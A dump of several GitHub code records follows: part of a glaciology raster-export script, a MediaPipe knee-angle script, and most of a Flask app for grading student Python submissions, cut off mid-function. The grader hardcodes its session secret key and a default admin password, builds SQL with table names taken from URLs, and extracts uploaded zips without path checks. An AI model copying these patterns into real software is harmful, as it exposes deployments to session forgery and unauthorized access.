0:\n\t\t\t\tfobj.write('\\n')\n# Finish Writing\n\tfobj.close()\n\n\n#### FETCH NPY GRIDS AND WRITE TO ASCII ####\nfrom glob import glob\n\n# ROOT = '/home/nates/ActiveProjects/SGGS/MANUSCRIPT_CONTENT/INTERPOLATION/Grids'\nROOT = '/home/nates/ActiveProjects/SGGS/MANUSCRIPT_CONTENT/INTERPOLATION/Grids'\n\n\n## LOAD COMMON COORDINATES ##\n# Load Easting & Northing Grid\nEE = np.load(ROOT+'/Easting_Grid.npy')\nNN = np.load(ROOT+'/Northing_Grid.npy')\n\n## LOAD HVSR & HYDROPOTENTIAL MODEL DATA ##\n# Load z_BED Grid\nHVu = np.load(ROOT+'/HVSR_Bed_Elevation_Mean_RBF.npy')\n# Load H_I Uncertainty Grid\nHVo = np.load(ROOT+'/HVSR_Ice_Thickness_STD_RBF.npy')\n\n## LOAD SURFACE VELOCITY & VERTICAL STRAIN RATE DATA ##\n# # Surface Velocity Vector Field\n# VSE = np.load(ROOT+'/Surface_Velocity_Easting_Mean_RBF.npy')\n# VSN = np.load(ROOT+'/Surface_Velocity_Northing_Mean_RBF.npy')\n# Vertical Strain Rate Field\nDEZ = np.load(ROOT+'/Surface_Vertical_Strain_Mean_RBF.npy')\n\n## LOAD MASKS ###\n# Load HVSR Used Station Mask \nM_HV = np.load(ROOT+'/HVSR_Station_RBF_MASK.npy')\n# Load Surface Velocity Station Mask\nM_VS = np.load(ROOT+'/Surface_Velocity_RBF_MASK.npy')\n\n\n## Reconstitute HVSR Layers\nHV_Shallow = (HVu + 2*HVo)*M_HV\nHV_Mean = HVu*M_HV\nHV_Deep = (HVu - 2*HVo)*M_HV\n# Write to file\nwrite_ascii_raster(ROOT+'/HVSR_Shallow_RBF_Bed',EE,NN,HV_Shallow)\nwrite_ascii_raster(ROOT+'/HVSR_Mean_RBF_Bed',EE,NN,HV_Mean)\nwrite_ascii_raster(ROOT+'/HVSR_Deep_RBF_Bed',EE,NN,HV_Deep)\n\n## Reconstitute Vertical Strain Rate Layers\nDEZ_Masked = DEZ*M_VS\nwrite_ascii_raster(ROOT+'/Surface_Vertical_Strain_Rate_RBF',EE,NN,DEZ_Masked)","repo_name":"nts345045/SG_Seven_Decades","sub_path":"util/npy2gis_grid.py","file_name":"npy2gis_grid.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40462088826","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nmp_drawing = mp.solutions.drawing_utils\nmp_pose = mp.solutions.pose\n\n#calculate the angle between two lines\ndef calculate_angle(a,b,c):\n a = np.array(a) # hip\n b = np.array(b) # knee\n c = np.array(c) # ankle\n\n radians = 
np.arctan2(c[1]-b[1], c[0]-b[0]) - np.arctan2(a[1]-b[1], a[0]-b[0])\n angle = np.abs(radians*180.0/np.pi)\n\n if angle >180.0:\n angle = 360-angle\n\n return angle\ncap = cv2.VideoCapture(1)\n#Setup mediapipe instance\nwith mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose:\n while cap.isOpened():\n ret, frame = cap.read()\n\n # Recolor image to RGB\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False\n\n # Make detection\n results = pose.process(image)\n\n # Recolor back to BGR\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n # Extract landmarks\n try:\n landmarks = results.pose_landmarks.landmark\n\n # Get coordinates\n hip = [landmarks[mp_pose.PoseLandmark.LEFT_HIP.value].x,landmarks[mp_pose.PoseLandmark.LEFT_HIP.value].y]\n knee = [landmarks[mp_pose.PoseLandmark.LEFT_KNEE.value].x,landmarks[mp_pose.PoseLandmark.LEFT_KNEE.value].y]\n ankle = [landmarks[mp_pose.PoseLandmark.LEFT_ANKLE.value].x,landmarks[mp_pose.PoseLandmark.LEFT_ANKLE.value].y]\n\n # Calculate angle\n angle = calculate_angle(hip, knee, ankle)\n\n # Visualize angle\n cv2.putText(image, str(angle), (50,150)\n ,\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA\n )\n #visualize lines and points\n center_hip= tuple(np.multiply(hip, [640, 480]).astype(int))\n center_knee= tuple(np.multiply(knee, [640, 480]).astype(int))\n center_ankle= tuple(np.multiply(ankle, [640, 480]).astype(int))\n cv2.circle(image,center_hip,5, (255, 0, 0), -1)\n cv2.circle(image,center_knee,5, (255, 0, 0), -1)\n cv2.circle(image,center_ankle,5, (255, 0, 0), -1)\n\n cv2.line(image, center_hip, center_knee, (0,255, 0), 3)\n cv2.line(image, center_knee, center_ankle, (0,255, 0), 3)\n\n\n cv2.imshow('Sit to stand', image)\n\n except:\n pass\n\n\n\n if cv2.waitKey(10) & 0xFF == ord('c'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n","repo_name":"mohammadsanaee/Mediapipe-machine-learning-approach-in-rehabilition-robots","sub_path":"Mediapipe angle detection.py","file_name":"Mediapipe angle detection.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30520849505","text":"from flask import Flask, render_template, send_from_directory, redirect, abort, request, jsonify, session, __version__, Response, make_response\nimport logging\n\nimport os\nimport zipfile\n\nimport sqlite3\n\nimport json\n\nimport threading\nimport subprocess\nimport re\nimport time\nimport datetime\nimport sys\nimport random\n\nimport argon2 #argon2-cffi\n\napp = Flask(__name__)\n\ninput_path = './input/'\nrun_path = './environ/'\n\ndbfile = 'ccp2.db'\n\napp.secret_key = b'\\x06\\xdcNB\\x93\\x9e-N\\xf0*\\x82\\xad\\x80\\x1e\\x95\\x0e'\nlogger = logging.getLogger('werkzeug')\nhandler = logging.FileHandler('access.log')\nlogger.addHandler(handler)\napp.testing = True\n\n@app.route('/auth', methods=['POST'])\ndef auth():\n\tph = argon2.PasswordHasher()\n\tpassword = getconfig('password')\n\tif password == None:\n\t\tpassword = ph.hash('ccp2021')\n\ttry:\n\t\tph.verify(password, request.form['password'])\n\t\tsession['auth'] = True\n\t\treturn redirect('/')\n\texcept:\n\t\tpass\n\tabort(403)\n\ndef get_all_list():\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"project\";')\n\tmetadata = c.fetchone()\n\tproject = json.loads(metadata[2])\n\tif 'auth' not in session:\n\t\tproject = list(filter(lambda x: x['public'], 
project))\n\tproject = list(map(lambda x: x['name'], project))\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"hw\";')\n\tmetadata = c.fetchone()\n\thw = json.loads(metadata[2])\n\tif 'auth' not in session:\n\t\thw = list(filter(lambda x: x['public'], hw))\n\thw = list(map(lambda x: x['name'], hw))\n\n\treturn hw + project\n\ndef get_all_list_dict():\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"project\";')\n\tmetadata = c.fetchone()\n\tproject = json.loads(metadata[2])\n\tif 'auth' not in session:\n\t\tproject = filter(lambda x: x['public'], project)\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"hw\";')\n\tmetadata = c.fetchone()\n\thw = json.loads(metadata[2])\n\tif 'auth' not in session:\n\t\thw = filter(lambda x: x['public'], hw)\n\tresult = dict([(i['name'], i) for i in project]+[(i['name'], i) for i in hw])\n\treturn result\n\ndef prepare_data():\n\tinit_db()\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\ttry:\n\t\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"project\";')\n\t\tmetadata = c.fetchone()\n\t\tproject = json.loads(metadata[2])\n\t\tc.execute('SELECT * FROM `metadata` WHERE `type`=\"hw\";')\n\t\tmetadata = c.fetchone()\n\t\thw = json.loads(metadata[2])\n\texcept:\n\t\tproject = []\n\t\thw = []\n\n\tpassword = getconfig('password')\n\tpw_notset = password == None\n\t\n\treturn {'project': project, 'hw': hw, 'version': sys.version_info, 'fversion': __version__, 'auth': 'auth' in session, 'rand': random.random(), 'pw_notset': pw_notset}\n\ndef student_init():\n\treturn {\n\t\t'log_zip': '',\n\t\t'log_zip_detail': [],\n\t\t'score': -1,\n\t\t'code': '',\n\t\t'val': {\n\t\t\t'score': 0\n\t\t}\n\t}\n\n@app.route('/')\ndef index():\n\treturn render_template('index.html', data={'data': prepare_data()})\n\n@app.route('/details')\ndef detail():\n\tdeduce_decimal = getconfig('deduce_decimal', 0.1)\n\treturn render_template('details.html', data={'data': prepare_data(), 'deduce_decimal': deduce_decimal*100})\n\ndef getconfig(typetext, default=None):\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=?;', (typetext,))\n\tresult = c.fetchone()\n\tif result == None:\n\t\treturn default\n\telse:\n\t\treturn json.loads(result[2])\n\ndef setconfig(typetext, value):\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\tc.execute('SELECT * FROM `metadata` WHERE `type`=?;', (typetext,))\n\tresult = c.fetchone()\n\tvalue = json.dumps(value)\n\tif result == None:\n\t\tc.execute('INSERT INTO `metadata`(`type`, `value`) VALUES (?,?);', (typetext, value))\n\telse:\n\t\tc.execute('UPDATE `metadata` SET `value`=? 
WHERE `type`=?;', (value, typetext))\n\tconn.commit()\n\n@app.route('/settings', methods=['GET', 'POST'])\ndef settings():\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif request.method == 'POST':\n\t\tdata = prepare_data()\n\t\tsetconfig('max_error', float(request.form.get('max_error', 0)))\n\t\tsetconfig('deduce_decimal', float(request.form.get('deduce_decimal', 0))/100)\n\t\tsetconfig('deduce_wrong', float(request.form.get('deduce_wrong', 0))/100)\n\t\tsetconfig('deduce_tle', float(request.form.get('deduce_tle', 0))/100)\n\t\tsetconfig('deduce_runtime', float(request.form.get('deduce_runtime', 0))/100)\n\t\t\n\t\tsetconfig('time_limit', float(request.form.get('time_limit', 0)))\n\t\tsetconfig('script', request.form.get('script'))\n\t\tsetconfig('run_filename', request.form.get('run_filename'))\n\t\t\n\tdata = prepare_data()\n\tdeduce_decimal = getconfig('deduce_decimal', 0.1)\n\tdeduce_wrong = getconfig('deduce_wrong', 1.0)\n\tdeduce_tle = getconfig('deduce_tle', 1.0)\n\tdeduce_runtime = getconfig('deduce_runtime', 1.0)\n\n\tadmin_public_id = getconfig('admin_public_id', True)\n\tadmin_public_name = getconfig('admin_public_name', True)\n\n\tscript = getconfig('script', 'python3')\n\trun_filename = getconfig('run_filename', 'main.py')\n\t\n\tdeduce_decimal *= 100 #to percentage\n\tdeduce_wrong *= 100 #to percentage\n\tdeduce_tle *= 100 #to percentage\n\tdeduce_runtime *= 100 #to percentage\n\n\tmax_error = getconfig('max_error', 0.001)\n\ttime_limit = getconfig('time_limit', 1.0)\n\n\tdata_form = {'data': data, 'deduce_decimal': deduce_decimal, 'deduce_wrong': deduce_wrong, 'deduce_tle': deduce_tle, 'deduce_runtime': deduce_runtime, 'max_error': max_error, 'time_limit': time_limit, 'admin_public_id': admin_public_id, 'admin_public_name': admin_public_name, 'script': script, 'run_filename': run_filename}\n\treturn render_template('settings.html', data=data_form)\n\n@app.route('/settings/admin', methods=['POST'])\ndef settings_admin():\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif request.form.get('check-public-id') != None:\n\t\tsetconfig('admin_public_id', True)\n\telse:\n\t\tsetconfig('admin_public_id', False)\n\tif request.form.get('check-public-name') != None:\n\t\tsetconfig('admin_public_name', True)\n\telse:\n\t\tsetconfig('admin_public_name', False)\n\treturn redirect('/settings')\n\n@app.route('/settings/password', methods=['POST'])\ndef settings_password():\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif request.form.get('password') != None and request.form.get('password') != '' and request.form.get('password') == request.form.get('password-re'):\n\t\tph = argon2.PasswordHasher()\n\t\tpassword = ph.hash(request.form.get('password'))\n\t\tsetconfig('password', password)\n\t\treturn redirect('/settings')\n\tabort(418)\n\n@app.route('/logout')\ndef logout():\n\tif 'auth' in session:\n\t\tdel session['auth']\n\treturn redirect('/')\n\n@app.route('/project/')\ndef project(project_name):\n\tif project_name in get_all_list():\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\ttry:\n\t\t\tc.execute('CREATE TABLE `{}`(`id` INTEGER PRIMARY KEY AUTOINCREMENT, `student_id` TEXT, `student_name` TEXT, `result` INTEGER, `data` TEXT);'.format(project_name))\n\t\texcept:\n\t\t\tpass\n\t\ttry:\n\t\t\tc.execute('CREATE TABLE `{}_val`(`id` INTEGER PRIMARY KEY, `INPUT` TEXT, `OUTPUT` TEXT, `data` TEXT);'.format(project_name))\n\t\texcept:\n\t\t\tpass\n\t\tconn.commit()\n\t\tc.execute('SELECT * FROM `{}`;'.format(project_name))\n\t\tprojects = c.fetchall()\n\t\tprojects = 
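The settings view above stores each deduction rate as a fraction but displays it as a percentage, dividing by 100 on POST and multiplying by 100 before rendering. The round-trip, isolated:

def to_stored(form_value):
    return float(form_value) / 100   # "25" (percent, from the form) -> 0.25 (stored fraction)

def to_displayed(stored):
    return stored * 100              # 0.25 -> 25.0 (percent, for the template)

assert to_displayed(to_stored("25")) == 25.0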
list(map(lambda x: list(x), projects))\n\t\tscore_sum = 0\n\t\tproject_count = 1e-8\n\t\tscore_var = 0\n\t\tfor i in projects:\n\t\t\ti[4] = json.loads(i[4])\n\t\t\tif 'val' in i[4]:\n\t\t\t\tscore_sum += i[4]['val']['score']\n\t\t\t\tproject_count += 1\n\t\tscore_avg = score_sum / project_count\n\t\tfor i in projects:\n\t\t\tif 'val' in i[4]:\n\t\t\t\tscore_var += (i[4]['val']['score']-score_avg)**2\n\t\tscore_var = score_var / project_count\n\t\tscore_std = score_var**0.5\n\t\tc.execute('SELECT * FROM `{}_val`;'.format(project_name))\n\t\tval_set = c.fetchall()\n\t\tscore_max = 0\n\t\tfor i in val_set:\n\t\t\ti_decoded = json.loads(i[3])\n\t\t\tscore_max += i_decoded['score']\n\t\tsample_path = os.path.join(input_path, project_name, 'reference.py')\n\t\tsample = ''\n\t\tif os.path.exists(sample_path):\n\t\t\twith open(sample_path, 'r') as f:\n\t\t\t\tsample = f.read()\n\t\tadmin_public_id = getconfig('admin_public_id')\n\t\tadmin_public_name = getconfig('admin_public_name')\n\n\t\tif not 'auth' in session:\n\t\t\tpjhw = get_all_list_dict()\n\t\t\tnumbers = list(map(lambda x: x[1][-3:], projects))\n\t\t\tif not 'data_public' in pjhw[project_name]:\n\t\t\t\tpjhw[project_name]['data_public'] = False\n\t\t\tfor i in projects:\n\t\t\t\tif numbers.count(i[1][-3:]) > 1:\n\t\t\t\t\ti[2] = i[2][0]+'**'\n\t\t\t\telse:\n\t\t\t\t\ti[2] = '***'\n\t\t\t\ti[1] = '****-**'+i[1][-3:]\n\t\t\treturn render_template('project_public.html', data={'data': prepare_data(), 'project_name': project_name, 'projects': projects, 'score_avg': score_avg, 'score_max': score_max, 'score_std': score_std, 'sample': sample, 'data_public': pjhw[project_name]['data_public']})\n\t\treturn render_template('project.html', data={'data': prepare_data(), 'project_name': project_name, 'projects': projects, 'score_avg': score_avg, 'score_max': score_max, 'score_std': score_std, 'sample': sample, 'admin_public_id': admin_public_id, 'admin_public_name': admin_public_name})\n\telse:\n\t\tabort(404)\n\n@app.route('/project/add_student/', methods=['POST'])\ndef add_student(project_name):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tabort(404)\n\t\tif 'student-id' not in request.form or 'student-name' not in request.form:\n\t\t\tabort(406)\n\t\tstudent_id = request.form.get('student-id')\n\t\tstudent_name = request.form.get('student-name')\n\t\tdata = student_init()\n\t\tdata['log_zip'] = 'Unzip succeed'\n\t\tdata['log_zip_detail'] = ['main.py']\n\t\tresult = '1' #(unzip result)\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('INSERT INTO `{}`(`student_id`, `student_name`, `result`, `data`) VALUES (?,?,?,?)'.format(project_name), (student_id, student_name, result, json.dumps(data)))\n\t\tconn.commit()\n\t\treturn redirect('/project/{}'.format(project_name))\n\telse:\n\t\tabort(404)\n\n@app.route('/project/remove_student//', methods=['POST'])\ndef remove_student(project_name, student_id):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tabort(404)\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('DELETE FROM `{}` WHERE `id`=?;'.format(project_name), (student_id,))\n\t\tconn.commit()\n\t\treturn 'ok'\n\telse:\n\t\tabort(404)\n\n@app.route('/project/download/')\ndef project_download(project_name):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tabort(401)\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('SELECT * FROM `{}`;'.format(project_name))\n\t\tprojects = 
c.fetchall()\n\t\tprojects = list(map(lambda x: list(x), projects))\n\t\tscore_sum = 0\n\t\tproject_count = 1e-8\n\t\tresult = '#,student_id,student_name,filename,score(total),'\n\n\t\tc.execute('SELECT * FROM `{}_val`;'.format(project_name))\n\t\tval_set = c.fetchall()\n\t\tscore_max = 0\n\t\tfor k, i in enumerate(val_set):\n\t\t\ti_decoded = json.loads(i[3])\n\t\t\tscore_max += i_decoded['score']\n\t\t\tresult += 'case #{},'.format(k)\n\t\t\n\t\tresult += '\\n'\n\t\tresult += '0,(Max score),(Max score),,{},'.format(score_max)\n\n\t\tfor k, i in enumerate(val_set):\n\t\t\ti_decoded = json.loads(i[3])\n\t\t\tresult += '{},'.format(i_decoded['score'])\n\t\tresult += '\\n'\n\n\t\tfor i in projects:\n\t\t\ti[4] = json.loads(i[4])\n\t\t\tif 'val' in i[4]:\n\t\t\t\tscore_sum += i[4]['val']['score']\n\t\t\t\tproject_count += 1\n\t\t\t\tresult += '{},{},{},'.format(i[0], i[1], i[2])\n\t\t\t\tresult += '{},{},'.format(int(i[4]['log_zip']=='Unzip succeed'), i[4]['val']['score'])\n\t\t\t\tfor j in i[4]['val']['details']:\n\t\t\t\t\tresult += '{},'.format(j['score'])\n\t\t\t\tresult += '\\n'\n\t\tscore_avg = score_sum / project_count\n\t\t\n\t\tresp = make_response(result)\n\t\tresp.headers['Content-Type'] = 'text/csv;charset=UTF-8'\n\t\tresp.headers['Content-Disposition'] = 'attachment;filename={}.csv'.format(project_name)\n\t\treturn resp\n\telse:\n\t\tabort(404)\n\n@app.route('/project/upload/')\ndef project_upload(project_name):\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif project_name in get_all_list():\n\t\treturn render_template('upload.html', data={'data': prepare_data(), 'project_name': project_name})\n\n@app.route('/project/load/', methods=['POST'])\ndef project_load(project_name):\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif project_name in get_all_list():\n\t\tif 'file' not in request.files:\n\t\t\tabort(406)\n\t\tfile = request.files['file']\n\t\tpath = os.path.join(input_path, project_name)\n\t\tif not os.path.exists(path):\n\t\t\tos.mkdir(path)\n\t\tfile.save(os.path.join(path, 'uploaded.zip'))\n\t\twith zipfile.ZipFile(os.path.join(path, 'uploaded.zip'), 'r') as zipf:\n\t\t\tcontent = zipf.namelist()\n\t\t\tfor i in content:\n\t\t\t\tif i.split('.')[-1] == 'zip':\n\t\t\t\t\tzipf.extract(i, path)\n\n\t\tsubs = os.listdir(path)\n\t\tprocessed = {}\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\ttry:\n\t\t\tc.execute('DROP TABLE `{}`'.format(project_name))\n\t\t\tconn.commit()\n\t\t\tc.execute('CREATE TABLE `{}`(`id` INTEGER PRIMARY KEY AUTOINCREMENT, `student_id` TEXT, `student_name` TEXT, `result` INTEGER, `data` TEXT);'.format(project_name))\n\t\texcept:\n\t\t\tpass\n\t\tconn.commit()\n\t\t\n\t\tfor file in subs:\n\t\t\tif file.split('.')[-1] != 'zip': continue #ignore if not .zip\n\t\t\tif file == 'uploaded.zip': continue #ignore uploaded zip file\n\t\t\tstudent_name = file.split('_')[0]\n\t\t\tstudent_id = file.split('_')[1]\n\t\t\tresult = -1\n\t\t\tdata = student_init()\n\t\t\ttry:\n\t\t\t\twith zipfile.ZipFile(os.path.join(path, file), 'r') as zipf:\n\t\t\t\t\tcontent = zipf.namelist()\n\t\t\t\t\tcode = ''\n\t\t\t\t\tresult = 0\n\t\t\t\t\ttarget_path = os.path.join(path, student_name + '_' + student_id)\n\t\t\t\t\tfor i in content:\n\t\t\t\t\t\tfilename = i.split('/')[-1]\n\t\t\t\t\t\tif len(filename) > 0 and filename[0] == '.':\n\t\t\t\t\t\t\t#hidden file\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\telif len(i) >= 7 and i[-7:] == 'main.py' and result == 0:\n\t\t\t\t\t\t\tresult = 1\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tos.mkdir(target_path)\n\t\t\t\t\t\t\texcept 
FileExistsError:\n\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\tdata['log_zip_detail'] = [i]\n\t\t\t\t\t\t\tzipf.extract(i, os.path.join(target_path))\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\twith open(os.path.join(target_path, i), 'r') as f:\n\t\t\t\t\t\t\t\t\tcode = f.read()\n\t\t\t\t\t\t\texcept UnicodeDecodeError:\n\t\t\t\t\t\t\t\twith open(os.path.join(target_path, i), 'r', encoding='ISO-8859-1') as f:\n\t\t\t\t\t\t\t\t\tcode = f.read()\n\t\t\t\t\t\t\tdata['log_zip'] = 'Unzip succeed'\n\t\t\t\t\t\telif result == 1 and i[-7:] == 'main.py':\n\t\t\t\t\t\t\tresult = 2\n\t\t\t\t\t\t\tdata['log_zip'] = '>1 main.py files'\n\t\t\t\t\t\t\tdata['log_zip_detail'].append(i)\n\t\t\t\t\tif result == 0: #when no main.py is found\n\t\t\t\t\t\tfor j in content:\n\t\t\t\t\t\t\tif len(j) >= 3 and j[-3:] == '.py':\n\t\t\t\t\t\t\t\tfilename = j.split('/')[-1]\n\t\t\t\t\t\t\t\tif len(filename) > 0 and filename[0] == '.':\n\t\t\t\t\t\t\t\t\t#hidden file\n\t\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tdata['log_zip'] = 'no main.py'\n\t\t\t\t\t\t\t\t\tdata['log_zip_detail'].append(j)\n\t\t\t\t\t\t\t\t\tzipf.extract(j, os.path.join(target_path))\n\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\twith open(os.path.join(target_path, j), 'r') as f:\n\t\t\t\t\t\t\t\t\t\t\tcode = f.read()\n\t\t\t\t\t\t\t\t\texcept UnicodeDecodeError:\n\t\t\t\t\t\t\t\t\t\twith open(os.path.join(target_path, j), 'r', encoding='ISO-8859-1') as f:\n\t\t\t\t\t\t\t\t\t\t\tcode = f.read()\n\t\t\t\t\t\t\t\t\tresult = 3\n\t\t\t\t\tif result == 0:\n\t\t\t\t\t\tdata['log_zip'] = 'no .py found'\n\t\t\t\t\t\tdata['log_zip_detail'] = content\n\t\t\texcept zipfile.BadZipfile:\n\t\t\t\tdata['log_zip'] = 'Bad zip file'\n\t\t\tlog_zip_detail_decoded = []\n\t\t\tfor j in data['log_zip_detail']:\n\t\t\t\ttry:\n\t\t\t\t\tj = j.encode('437')\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tj = j.encode('utf8')\n\t\t\t\ttry:\n\t\t\t\t\tj = j.decode('utf8')\n\t\t\t\texcept:\n\t\t\t\t\tj = j.decode('949')\n\t\t\t\tlog_zip_detail_decoded.append(j)\n\t\t\tdata['log_zip_detail'] = log_zip_detail_decoded\n\t\t\tdata['code'] = code\n\t\t\tc.execute('INSERT INTO `{}`(`student_id`, `student_name`, `result`, `data`) VALUES (?,?,?,?)'.format(project_name), (student_id, student_name, result, json.dumps(data)))\n\t\t\tconn.commit()\n\t\treturn redirect('/project/' + project_name)\n\telse:\n\t\tabort(404)\n\n@app.route('/project/data/')\ndef project_data(project_name):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tpjhw = get_all_list_dict()\n\t\t\tif pjhw[project_name]['data_public'] == False:\n\t\t\t\tabort(404)\n\t\t\tconn = sqlite3.connect(dbfile)\n\t\t\tc = conn.cursor()\n\t\t\tc.execute('SELECT * FROM `{}_val`;'.format(project_name))\n\t\t\tval_set = c.fetchall()\n\t\t\tval_set = list(map(lambda x: list(x), val_set))\n\t\t\tfor i in val_set:\n\t\t\t\ti[3] = json.loads(i[3])\n\t\t\t\ti[2] = i[2].replace('\\n', '\\\\n')\n\t\t\t\ti[1] = i[1].replace('\\n', '\\\\n')\n\t\t\treturn render_template('validation_public.html', data={'data': prepare_data(), 'val_set': val_set, 'project_name': project_name})\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('SELECT * FROM `{}_val`;'.format(project_name))\n\t\tval_set = c.fetchall()\n\t\tval_set = list(map(lambda x: list(x), val_set))\n\t\tfor i in val_set:\n\t\t\ti[3] = json.loads(i[3])\n\t\t\ti[2] = i[2].replace('\\n', '\\\\n')\n\t\t\ti[1] = i[1].replace('\\n', '\\\\n')\n\t\t\tif 'val_mode' not in i[3]:\n\t\t\t\ti[3]['val_mode'] = {\n\t\t\t\t\t'check_num': 
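The decoding loop above exists because ZipFile decodes member names as CP437 whenever an archive lacks the UTF-8 name flag, which mangles Korean (CP949) filenames. A compact version of the same repair (standalone sketch; the codec choices mirror the record, error handling simplified):

def fix_zip_name(name):
    """Undo ZipFile's CP437 default for member names that were really UTF-8 or CP949."""
    try:
        raw = name.encode('cp437')    # recover the original bytes
    except UnicodeEncodeError:
        return name                   # the UTF-8 flag was set; the name is already correct
    try:
        return raw.decode('utf-8')
    except UnicodeDecodeError:
        return raw.decode('cp949')    # common for archives produced on Korean systems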
True,\n\t\t\t\t\t'check_char': True\n\t\t\t\t}\n\t\tmetadata = getconfig('metadata_{}'.format(project_name), {})\n\t\tif 'is_val_custom' not in metadata:\n\t\t\tmetadata['is_val_custom'] = False\n\t\tif 'code_val_custom' not in metadata:\n\t\t\tmetadata['code_val_custom'] = ''\n\t\treturn render_template('validation.html', data={'data': prepare_data(), 'val_set': val_set, 'project_name': project_name, 'is_val_custom': metadata['is_val_custom'], 'code_val_custom': metadata['code_val_custom']})\n\telse:\n\t\tabort(404)\n\n@app.route('/project/validation/', methods=['POST'])\ndef validation_save(project_name):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tabort(403)\n\t\telse:\n\t\t\tmetadata = getconfig('metadata_{}'.format(project_name), {})\n\t\t\tif request.form.get('check-custom') == 'on':\n\t\t\t\tmetadata['is_val_custom'] = True\n\t\t\t\tmetadata['code_val_custom'] = request.form.get('code')\n\t\t\telse:\n\t\t\t\tmetadata['is_val_custom'] = False\n\t\t\tsetconfig('metadata_{}'.format(project_name), metadata)\n\t\t\t\t\n\t\t\treturn redirect('/project/data/{}'.format(project_name))\n\telse:\n\t\tabort(404)\n\ndef init_db():\n\tconn = sqlite3.connect(dbfile)\n\tc = conn.cursor()\n\ttry:\n\t\tc.execute('CREATE TABLE `metadata`(`id` INTEGER PRIMARY KEY AUTOINCREMENT, `type` TEXT, `value` TEXT);')\n\t\tconn.commit()\n\texcept:\n\t\tpass\n\n@app.route('/manage')\ndef manage():\n\tif not 'auth' in session:\n\t\tabort(404)\n\tinit_db()\n\tproject = getconfig('project', [])\n\thw = getconfig('hw', [])\n\treturn render_template('manage.html', data={'data': prepare_data(), 'project': project, 'hw': hw})\n\n@app.route('/manage/save/', methods=['POST'])\ndef manage_save(reqtype):\n\tif not 'auth' in session:\n\t\tabort(404)\n\tdata = []\n\tfor k, i in request.json.items():\n\t\tdata.append({'id': i['id'], 'name': i['name'], 'public': i['public'], 'data_public': i['data_public']})\n\n\treqtype_table = {\n\t\t'0': 'hw',\n\t\t'1': 'project'\n\t}\n\n\tsetconfig(reqtype_table[reqtype], data)\n\t\n\treturn 'ok'\n\n@app.route('/project/save//', methods=['POST'])\ndef project_code_save(project_name, index):\n\tif not 'auth' in session:\n\t\tabort(401)\n\tif project_name in get_all_list():\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('SELECT * FROM `{}` WHERE `id`=?;'.format(project_name), (index,))\n\t\tresult = c.fetchone()\n\t\tresult = json.loads(result[4])\n\t\ttry:\n\t\t\tresult['code'] = request.form.get('code')\n\t\t\tresult = json.dumps(result)\n\t\t\tc.execute('UPDATE {} SET `data`=? 
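Nearly every route above funnels its settings through getconfig/setconfig, a small JSON-in-SQLite key-value layer built on the metadata table. A compact standalone equivalent (illustrative file and table names; the upsert form assumes SQLite >= 3.24):

import json
import sqlite3

def _conn():
    conn = sqlite3.connect('settings.db')
    conn.execute('CREATE TABLE IF NOT EXISTS metadata (type TEXT PRIMARY KEY, value TEXT)')
    return conn

def setconfig(key, value):
    with _conn() as conn:  # the connection context manager commits on success
        conn.execute(
            'INSERT INTO metadata(type, value) VALUES (?, ?) '
            'ON CONFLICT(type) DO UPDATE SET value = excluded.value',
            (key, json.dumps(value)))

def getconfig(key, default=None):
    row = _conn().execute('SELECT value FROM metadata WHERE type = ?', (key,)).fetchone()
    return default if row is None else json.loads(row[0])

setconfig('time_limit', 1.5)
print(getconfig('time_limit'))  # 1.5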
